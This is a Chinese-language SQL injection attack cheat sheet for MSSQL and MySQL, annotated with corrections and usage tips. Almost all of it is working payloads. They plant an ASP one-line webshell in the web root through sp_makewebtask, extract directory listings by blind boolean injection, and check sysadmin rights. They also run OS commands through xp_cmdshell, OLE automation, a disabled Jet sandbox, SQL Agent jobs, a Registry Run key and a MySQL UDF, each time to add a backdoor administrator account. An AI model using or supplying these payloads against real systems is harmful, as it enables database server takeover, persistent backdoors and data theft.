MSSQL 语句导出一句话木马
首先确定网站的 WEB 物理路径（例如从页面报错信息中获得，或用下文"MSSQL 列目录"一节的 xp_dirtree 方法逐层列出），否则后面的 @outputfile 无处可写。
;create table pcguest(pc char(255));--
-- 建一个表用于存放一句话木马。以 ; 开头表示这是堆叠在原查询后面的注入语句，末尾的 -- 注释掉原 SQL 的剩余部分；
-- char(255) 会用空格补齐到 255 位，导出文件里会带大量尾随空格，改用 varchar(255) 可以避免

;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
-- 将一句话木马插入表中。%3c%25…%25%3e 是 URL 编码，由 Web 服务器解码后实际写入的是 <%execute request("p")%>；
-- 如果注入点不经过 URL 解码（如 POST 正文、Cookie），要直接发送解码后的明文

;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
-- 导出一个 ASP 文件。@outputfile 必须是上一步确定的 Web 根目录下的物理路径，且 SQL Server 服务账户要对该目录有写权限；
-- sp_makewebtask 属于 Web Assistant 存储过程，需要 sysadmin 权限，在 SQL Server 2005 中已弃用并默认关闭，2008 起已移除，基本只对 SQL Server 2000 有效；
-- 导出的文件外面会包一层 HTML，但其中的 <% %> 代码仍会被 ASP 解析执行
关于 MSSQL 列目录
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100));--
-- 建一个新表，三列必须与 xp_dirtree 带 3 个参数时的输出列（subdirectory, depth, file）一一对应，否则 INSERT … EXEC 会报列数不匹配
;Insert pctest exec master..xp_dirtree 'd:\app\',1,1;--
-- 用 xp_dirtree 列目录并把结果导入所建的表。第 2 个参数是递归深度，第 3 个参数为 1 时连文件一起列出（file 列为 1 表示文件、0 表示目录）；
-- 路径建议用单引号，原文的双引号在 QUOTED_IDENTIFIER ON（ODBC/OLE DB 连接的默认设置）下会按标识符解析，行为依赖连接设置；
-- 另外 T-SQL 中 // 不是注释语法，本文各行末尾的说明文字不能随 payload 一起发送
and (select Count(1) from [pctest]) between 0 and 99
-- 猜解表中的行数（不是字段数）来得知共列出了多少个文件和目录，范围可用二分法逐步缩小
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20
-- 猜解第 2 条记录的 file+subdirectory 拼接后的长度：内层 Top N 按顺序取前 N 条，外层倒序再取 1 条，N 就是要猜的行号

And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130
-- 逐位猜解该记录的每个字符（猜的是字段值，不是字段名）：substring 的起始位置（这里的 1）从 1 递增到上一步得到的长度，用 between 对 unicode 码二分定位；
-- 内层的 Top N 要与猜长度时保持一致（原文一处 Top 2、一处 Top 1，对应的是不同的行）；
-- 30~130 只覆盖可打印 ASCII，文件名含中文等非 ASCII 字符时 unicode() 会大于 130，需要扩大范围
数据库版本和权限查看
and 1=(select @@VERSION)
-- 查看详细的数据库版本信息：@@VERSION 是 nvarchar，与整数 1 比较时类型转换失败，版本字符串会出现在转换错误信息里，因此依赖页面回显数据库错误
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--
-- 判断当前登录是否属于 sysadmin 固定服务器角色（即通常所说的 SA 权限）：属于返回 1、条件为真，不属于返回 0、条件为假，登录名不存在时返回 NULL
and 1=(SELECT IS_MEMBER('db_owner'));--
-- 判断当前用户在当前数据库中是否属于 db_owner 角色（角色名拼写为 db_owner，不是 DB_ONWER）
1.利用 xp_cmdshell 执行命令
exec master..xp_cmdshell 'net user rfire 123456 /add'
exec master..xp_cmdshell 'net localgroup administrators rfire /add'
-- 命令以 SQL Server 服务账户的身份执行，只有服务账户本身具备管理员权限（如 LocalSystem）时，添加用户并加入 administrators 组才会成功；
-- SQL Server 2005 起 xp_cmdshell 默认关闭，需要 sysadmin 权限通过 sp_configure 打开；rfire/123456 只是示例账号

恢复 xp_cmdshell 存储过程（xp_cmdshell 被 sp_dropextendedproc 删除、但 xplog70.dll 仍在时）
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
-- 需要 sysadmin 权限；若 xplog70.dll 也被删除，此法无效，改用下面的 SP_OAcreate 等方法
2.利用 SP_OAcreate 和 SP_OAMETHOD 执行命令
适用于 wscript.shell 组件存在、而 xp_cmdshell 和 xplog70.dll 都已被删除的情况。前提：拥有 sysadmin 权限，且 "Ole Automation Procedures" 选项已开启（SQL Server 2005 起默认关闭，需通过 sp_configure 打开）。
DECLARE @shell INT
-- 声明一个整型变量，用来保存 OLE 对象句柄
EXEC SP_OAcreate 'wscript.shell',@shell out
-- 创建 wscript.shell 的 OLE 对象实例，句柄通过输出参数写入 @shell
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add'
-- 调用该实例的 run 方法执行命令。三条语句依赖同一个 @shell 变量，必须放在同一批次（同一个请求）中发送；
-- 命令同样以 SQL Server 服务账户身份运行，且没有回显，需要用其他方式确认结果
3.利用沙盒模式
先利用 xp_regwrite（前提是 xp_regwrite 存在且有 sysadmin 权限）修改注册表关闭 Jet 的沙盒限制，然后用 OpenRowSet 通过 Jet 引擎打开系统自带的 mdb 文件，在 Jet 的 SQL 语句里调用 shell() 执行命令。
"开启沙盒模式"（准确地说是把 SandBoxMode 设为 0，即关闭 Jet 沙盒限制，允许表达式中调用 shell()）：
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
-- 注册表键名是 Engines（复数），原文写成 Engine 会写到错误的位置而不生效

执行命令:
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
-- 前提：OpenRowSet 可用（SQL Server 2005 起 "Ad Hoc Distributed Queries" 默认关闭），且机器上装有 32 位的 Jet 4.0 提供程序（64 位 SQL Server 没有 Jet 4.0）；
-- ias.mdb 只是一个系统通常自带的 Access 文件，换成其他存在且可读的 mdb 同样可以；命令以 SQL Server 服务账户身份执行
4.利用 SQL 代理执行命令
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'
-- 使用 xp_servicecontrol 启动 SQLSERVERAGENT 服务（需要 sysadmin；命名实例的服务名形如 SQLAgent$实例名；Express 版的 Agent 不可用）
执行命令:
use msdb exec sp_delete_job null,'x'
-- 进入 msdb 数据库并先删除同名作业 x，避免重复创建时报错
exec sp_add_job 'x'
-- 创建作业 x
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add'
-- 添加一个 CMDEXEC 类型的作业步骤，参数依次为 @job_id, @job_name, @step_id, @step_name, @subsystem, @command
exec sp_add_jobserver Null,'x',@@servername
exec sp_start_job 'x'
-- 把作业分配到本机并立即启动。原文此处写成 sp_add_job 'x' 是笔误：作业已存在，再次 sp_add_job 只会报错而不会启动；
-- 作业异步执行，命令以 SQL Server Agent 服务账户身份运行（未配置代理账户时），执行完毕后可再用 sp_delete_job 清理
5.利用注册表项执行命令（用 xp_regwrite 将执行命令写入启动项）
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','shell','REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
-- 原文漏掉了第 1 个参数 'HKEY_LOCAL_MACHINE'，并把 'shell' 与 'REG_SZ' 之间的逗号写成了点，这里按第 3 节 xp_regwrite 的参数顺序（根键、子键、值名、类型、数据）修正；
-- 写入 Run 启动项不会立即执行，要等到下一次有用户交互登录时才以该用户的权限运行，只有管理员用户登录时 net user /add 才会成功
6.MYSQL 的命令执行
MYSQL 的 UDF 自定义函数提权（要求账号对 mysql 库拥有 insert 和 delete 权限，CREATE/DROP FUNCTION 需要写入和删除 mysql.func 中的记录）
首先要通过 su.php 之类的工具把 udf.dll 导出到 c:\windows\udf.dll。
-- dll 的位数（32/64）要与 MySQL 进程一致；MySQL 5.0.67 / 5.1.19 起 UDF 库只能从 plugin_dir 目录加载，写到 windows 目录只对更早的版本有效
导出后执行创建自定义函数命令：
Create Function cmdshell returns string soname 'udf.dll'
-- 函数名 cmdshell 必须是该 dll 中实际导出的符号名
执行命令：
select cmdshell('net user rfire 123456 /add')
-- 命令以 MySQL 服务账户身份执行（Windows 上通常是 LocalSystem，因此一般能直接添加用户）
执行后删除函数：drop function cmdshell